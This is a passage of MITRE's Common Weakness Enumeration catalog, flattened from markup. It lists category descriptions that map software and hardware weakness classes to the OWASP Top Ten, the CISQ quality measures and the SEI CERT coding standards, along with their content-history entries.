failed attempts to access a given resource. The weaknesses in this category could lead to a degradation of access to system assets if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - Weaknesses in this category are related to the design and architecture of session management. Frequently these deal with the information or status about each user and their access rights for the duration of multiple requests. The weaknesses in this category could lead to a degradation of the quality of session management if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - Weaknesses in this category are related to the design and architecture of a system's input validation components. Frequently these deal with sanitizing, neutralizing and validating any externally provided inputs to minimize malformed data from entering the system and preventing code injection in the input data. The weaknesses in this category could lead to a degradation of the quality of data flow in a system if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - Weaknesses in this category are related to the design and architecture of a system's data integrity components. Frequently these deal with ensuring integrity of data, such as messages, resource files, deployment files, and configuration files. The weaknesses in this category could lead to a degradation of data integrity quality if they are not addressed when designing or implementing a secure architecture. - - - - - - - - - - - - - - - - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - - - Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2017. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2017. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2017. - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2017. - - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2017. - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2017. - - - - - - - - - - While the OWASP document maps to CWE-2 and CWE-388, these are not appropriate for mapping, as they are high-level categories that are only intended for the Seven Pernicious Kingdoms view (CWE-700). - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2017. - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2017. - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017. - - - - - This is an unusual category. CWE does not cover the limitations of human processes and procedures that cannot be described in terms of a specific technical weakness as resident in the code, architecture, or configuration of the software. Since "known vulnerabilities" can arise from any kind of weakness, it is not possible to map this OWASP category to other CWE entries, since it would effectively require mapping this category to ALL weaknesses. - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2017. - - - - - - - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - Weaknesses in this category are related to the CISQ Quality Measures for Reliability, as documented in 2016 with the Automated Source Code CISQ Reliability Measure (ASCRM) Specification 1.0. Presence of these weaknesses could reduce the reliability of the software. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-07-23 - Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. - - - CWE Content Team - MITRE - 2020-06-25 - updated References - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Name - - CISQ Quality Measures - Reliability - - - - Weaknesses in this category are related to the CISQ Quality Measures for Maintainability, as documented in 2016 with the Automated Source Code Maintainability Measure (ASCMM) Specification 1.0. Presence of these weaknesses could reduce the maintainability of the software. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-07-23 - Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. - - - CWE Content Team - MITRE - 2020-06-25 - updated References - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Name - - CISQ Quality Measures - Maintainability - - - - Weaknesses in this category are related to the CISQ Quality Measures for Security, as documented in 2016 with the Automated Source Code Security Measure (ASCSM) Specification 1.0. Presence of these weaknesses could reduce the security of the software. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-07-23 - Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. - - - CWE Content Team - MITRE - 2020-06-25 - updated References - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Name - - CISQ Quality Measures - Security - - - - Weaknesses in this category are related to the CISQ Quality Measures for Performance Efficiency, as documented in 2016 with the Automated Source Code Performance Efficiency Measure (ASCPEM) Specification 1.0. Presence of these weaknesses could reduce the performance efficiency of the software. - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-07-23 - Constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. - - - CWE Content Team - MITRE - 2020-06-25 - updated References - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Name - - CISQ Quality Measures - Performance - - - - Weaknesses in this category are related to the rules and recommendations in the Input Validation and Data Sanitization (IDS) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Numeric Types and Operations (NUM) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Characters and Strings (STR) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Object Orientation (OBJ) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Methods (MET) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Exceptional Behavior (ERR) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Visibility and Atomicity (VNA) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Locking (LCK) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Thread APIs (THI) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Thread Pools (TPS) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Thread-Safety Miscellaneous (TSM) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Input Output (FIO) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Serialization (SER) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Platform Security (SEC) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Runtime Environment (ENV) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Java Native Interface (JNI) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - - - Weaknesses in this category are related to the rules and recommendations in the Android (DRD) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - CWE Content Team - MITRE - 2019-06-20 - updated Description - - - - - Weaknesses in this category are related to the rules and recommendations in the Preprocessor (PRE) section of the SEI CERT C Coding Standard. - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) section of the SEI CERT C Coding Standard. - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Integers (INT) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Floating Point (FLP) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Arrays (ARR) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Characters and Strings (STR) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Memory Management (MEM) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Input Output (FIO) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Environment (ENV) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Signals (SIG) section of the SEI CERT C Coding Standard. - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Error Handling (ERR) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Application Programming Interfaces (API) section of the SEI CERT C Coding Standard. - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Concurrency (CON) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the POSIX (POS) section of the SEI CERT C Coding Standard. - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - - - Weaknesses in this category are related to the rules and recommendations in the Microsoft Windows (WIN) section of the SEI CERT C Coding Standard. - - - - - - - - - - - CWE Content Team - MITRE - 2018-12-18 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Concurrency (CON) section of the SEI CERT Oracle Secure Coding Standard for Java. - - - - - - CWE Content Team - MITRE - 2018-12-11 - - - CWE Content Team - MITRE - 2019-06-20 - updated Description - - - - - Weaknesses in this category are related to the rules and recommendations in the Input Validation and Data Sanitization (IDS) section of the SEI CERT Perl Coding Standard. - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Declarations and Initialization (DCL) section of the SEI CERT Perl Coding Standard. - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Expressions (EXP) section of the SEI CERT Perl Coding Standard. - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Integers (INT) section of the SEI CERT Perl Coding Standard. - - - - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Strings (STR) section of the SEI CERT Perl Coding Standard. - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - - - Weaknesses in this category are related to the rules and recommendations in the Object-Oriented Programming (OOP) section of the SEI CERT Perl Coding Standard. - - - - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the File Input and Output (FIO) section of the SEI CERT Perl Coding Standard. - - - - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) section of the SEI CERT Perl Coding Standard. - - - - - - - - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Weaknesses in this category are root-caused to defects that arise in the semiconductor-manufacturing process or during the life cycle and supply chain. - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Weaknesses in this category are related to improper design of full-system security flows, including but not limited to secure boot, secure update, and hardware-device attestation. - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - Weaknesses in this category are those that arise due to integration of multiple hardware Intellectual Property (IP) cores, from System-on-a-Chip (SoC) subsystem interactions, or from hardware platform subsystem interactions. - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Description - - - - - Weaknesses in this category are related to features and mechanisms providing hardware-based isolation and access control (e.g., identity, policy, locking control) of sensitive shared hardware resources such as registers and fuses. - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - Weaknesses in this category are related to hardware-circuit design and logic (e.g., CMOS transistors, finite state machines, and registers) as well as issues related to hardware description languages such as System Verilog and VHDL. - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Weaknesses in this category are typically associated with CPUs, Graphics, Vision, AI, FPGA, and microcontrollers. - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Weaknesses in this category are typically associated with memory (e.g., DRAM, SRAM) and storage technologies (e.g., NAND Flash, OTP, EEPROM, and eMMC). - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - - - - Weaknesses in this category are related to hardware - security problems that apply to peripheral devices, IO - interfaces, on-chip interconnects, network-on-chip (NoC), - and buses. For example, this category includes issues - related to design of hardware interconnect and/or protocols - such as PCIe, USB, SMBUS, general-purpose IO pins, and - user-input peripherals such as mouse and keyboard. - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - Weaknesses in this category are related to hardware implementations of cryptographic protocols and other hardware-security primitives such as physical unclonable functions (PUFs) and random number generators (RNGs). - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - Weaknesses in this category are related to system power, voltage, current, temperature, clocks, system state saving/restoring, and resets at the platform and SoC level. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - Weaknesses in this category are related to hardware debug and test interfaces such as JTAG and scan chain. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - Weaknesses in this category can arise in multiple areas of hardware design or can apply to a wide cross-section of components. - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-27 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Weaknesses in this category are related to audit-based components of a software system. Frequently these deal with logging user activities in order to identify undesired access and modifications to the system. The weaknesses in this category could lead to a degradation of the quality of the audit capability if they are not addressed. - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to authentication components of a system. Frequently these deal with the ability to verify that an entity is indeed who it claims to be. If not addressed when designing or implementing a software system, these weaknesses could lead to a degradation of the quality of the authentication capability. - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to authorization components of a system. Frequently these deal with the ability to enforce that agents have the required permissions before performing certain operations, such as modifying data. If not addressed when designing or implementing a software system, these weaknesses could lead to a degradation of the quality of the authorization capability. - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to a software system's random number generation. - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to a software system's data integrity components. Frequently these deal with the ability to ensure the integrity of data, such as messages, resource files, deployment files, and configuration files. The weaknesses in this category could lead to a degradation of data integrity quality if they are not addressed. - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to a software system's components for input validation, output validation, or other kinds of validation. Validation is a frequently-used technique for ensuring that data conforms to expectations before it is further processed as input or output. There are many varieties of validation (see CWE-20, which is just for input validation). Validation is distinct from other techniques that attempt to modify data before processing it, although developers may consider all attempts to product "safe" inputs or outputs as some kind of validation. Regardless, validation is a powerful tool that is often used to minimize malformed data from entering the system, or indirectly avoid code injection or other potentially-malicious patterns when generating output. The weaknesses in this category could lead to a degradation of the quality of data flow in a system if they are not addressed. - - - - - - - - - - - - - CWE-20 (Improper Input Validation) is not included in this category because it is a Class level, and this category focuses more on Base level weaknesses. Also note that other kinds of weaknesses besides improper validation are included as members of this category. - - - - - CWE Content Team - MITRE - 2019-12-30 - - - CWE Content Team - MITRE - 2020-06-25 - updated Description, Name, Relationship_Notes, Relationships - - Input Validation Issues - - - - Weaknesses in this category are related to a software system's lockout mechanism. Frequently these deal with scenarios that take effect in case of multiple failed attempts to access a given resource. The weaknesses in this category could lead to a degradation of access to system assets if they are not addressed. - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to session management. Frequently these deal with the information or status about each user and their access rights for the duration of multiple requests. The weaknesses in this category could lead to a degradation of the quality of session management if they are not addressed. - - - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to the handling of memory buffers within a software system. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-12-30 - - - - - Weaknesses in this category are related to the handling of files within a software system. Files, directories, and folders are so central to information technology that many different weaknesses and variants have been discovered. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-02-14 - - - - - Weaknesses in this category are related to the documentation provide to support a product. - - - - - - - - - - - CWE Content Team - MITRE - 2020-01-07 - - - - - Weaknesses in this category are associated with things being overly complex. - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-01-07 - - - - - Weaknesses in this category are related to issues surrounding the bundling of data with the methods intended to operate on that data. - - - - - - - - - - - - CWE Content Team - MITRE - 2020-01-07 - - - - - Weaknesses in this category are related to the use of built-in functions or external APIs. - - - - - - - - - - - - CWE Content Team - MITRE - 2020-01-07 - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty Resource Release cluster (SFP37). - - - - - - - - KDM Analytics - 2019-11-25 - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Failure to Release Memory cluster (SFP38). - - - - - - KDM Analytics - 2019-11-25 - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Weaknesses in this category are related to the CISQ Quality Measures for Reliability. Presence of these weaknesses could reduce the reliability of the software. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-08-18 - - - - - Weaknesses in this category are related to the CISQ Quality Measures for Maintainability. Presence of these weaknesses could reduce the maintainability of the software. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-08-18 - - - - - Weaknesses in this category are related to the CISQ Quality Measures for Security. Presence of these weaknesses could reduce the security of the software. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-08-18 - - - - - Weaknesses in this category are related to the CISQ Quality Measures for Efficiency. Presence of these weaknesses could reduce the efficiency of the software. - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-08-18 - - - - - Weaknesses in this category are related to the creation and modification of strings. - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to the A01 category "Broken Access Control" in the OWASP Top Ten 2021. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A02 category "Cryptographic Failures" in the OWASP Top Ten 2021. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A03 category "Injection" in the OWASP Top Ten 2021. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include high-level Class and/or Pillar weaknesses. The CWE Program will work with OWASP to improve these mappings, possibly including modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A04 "Insecure Design" category in the OWASP Top Ten 2021. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A05 category "Security Misconfiguration" in the OWASP Top Ten 2021. - - - - - - - - - - - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A06 category "Vulnerable and Outdated Components" in the OWASP Top Ten 2021. - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A07 category "Identification and Authentication Failures" in the OWASP Top Ten 2021. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A08 category "Software and Data Integrity Failures" in the OWASP Top Ten 2021. - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A09 category "Security Logging and Monitoring Failures" in the OWASP Top Ten 2021. - - - - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are related to the A10 category "Server-Side Request Forgery (SSRF)" in the OWASP Top Ten 2021. - - - - - - - - - As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - Weaknesses in this category are caused by improper data type transformation or improper handling of multiple data types. - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Weaknesses in this category are related to the creation or neutralization of data using an incorrect format. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Name, Relationships - - Representation Errors - Data Representation Errors - - - - This entry has been deprecated. 